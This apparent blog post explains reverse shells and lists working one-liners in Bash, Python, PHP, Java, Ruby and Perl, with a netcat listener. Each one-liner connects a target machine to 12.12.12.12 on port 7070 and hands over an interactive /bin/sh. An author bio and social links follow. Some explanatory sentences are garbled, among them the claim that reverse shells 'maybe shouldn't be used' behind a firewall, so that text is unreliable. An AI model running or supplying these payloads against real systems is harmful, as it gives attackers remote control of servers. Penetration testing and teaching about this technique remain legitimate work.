Reverse Shells
How do reverse shells work?
To make a connection to a typical remote shell, a machine controlled by the attacker connects to the remote network host and it requests a shell connection.
This is called a blind shell
But what if the remote host is not directly accessible, like it has public IP or is protected by a firewall?
In this situation reverse shells maybe shouldn't be used, where the target machine initiates connection to the listening network host a shell is now established.
Reverse Shells Examples
To start you need a listener process on their system to listen the reverse shell connections incoming to their IP address, Eg, 12.12.12.12
On Linux, this can be as simple as one netcat command.
nc -lvnp 7070
The netcat listener will listen at port 7070
. An attacker needs to execute the code to the listener. Many reverse shells needs programming langs
and systems.
Check out pentestmonkey’s Reverse Shell Cheat Sheet for more.
Codes are typically one-liners to allow injection using a single command.
While the examples below are for Linux and other Unix-like systems, many of them will also work on Windows if you change the command line interpreter call from /bin/sh -i
to cmd.exe
.
Bash Reverse Shell
If the target machine runs Linux, it’s a good idea to start with bash, as nearly all Linux systems come with this system shell:
/bin/bash -i >& /dev/tcp/12.12.12.12/7070 0>&1
Python Reverse Shell
With Python continuing to gain popularity, there’s a good chance it’s available on the target server and can be used to execute a script like:
python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("12.12.12.12",7070));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);'
PHP Reverse Shell
Most web servers will have PHP installed, and this too can provide a reverse shell vector (if the file descriptor &3 doesn’t work, you can try subsequent numbers):
php -r '$sock=fsockopen("12.12.12.12",7070);exec("/bin/sh -i <&3 >&3 2>&3");'
Java Reverse Shell
Java is likely to be available on application servers:
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/12.12.12.12/7070;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
Ruby Reverse Shell
Ruby is another popular web application language that’s likely to have an interpreter on a general-purpose server system:
ruby -rsocket -e'f=TCPSocket.open("12.12.12.12",7070).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)'
Perl Reverse Shell
As with bash, a perl interpreter should be available on most Linux servers, so a perl command might be another way to obtain a reverse shell:
perl -e 'use Socket;$i="12.12.12.12";$p=7070;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
Check out my Gist Here
Credits
Yuma-Tsushima07 / Yuma-Tsushima07
Readme file
Welcome to Yuma-Tsushima's Github page!
About Myself
Hello, my name is Yuma-Tsushima (frequently shortened to Yuma). I am an ambitious coder, and I enjoy coding in JavaScript (mainly). I also love making websites using HTML, CSS and (of course) JS! I started programming (self taught) at the age of 13. Originally, I came from the creative field ; I draw/sing/animate/make music.
Talents and Hobbies
I love drawing (I have been drawing all of my life). I play strategy games, I code and I do CTFs! I am also good at animation, making AMVs and image editing. My favourite game is Mindustry, followed by Flow Free and Sudoku. I love watching anime (I love Code Geass - I relate to Lelouch a lot) and I aspire to create my own anime!
Check out my work!:
❯ Soundcloud : 0c7av3h4ck5
❯ Discord : {CyberArtByte}
❯ Artwork : AcceleratorArts07
Recent Medium…
Follow me!
- Github: https://github.com/Yuma-Tsushima07
- Medium: https://0xv37r1x3r.medium.com/
- SoundCloud: https://soundcloud.com/0c7av3h4ck5
Discord Servers!!
Bounty Hunters: An amazing bug hunting community full of developers and exploiters!!!
CyberArtByte: My server full of bling and joy!!
New Soundcloud Track!!
Author: Yuma-Tsushima07
Top comments (0)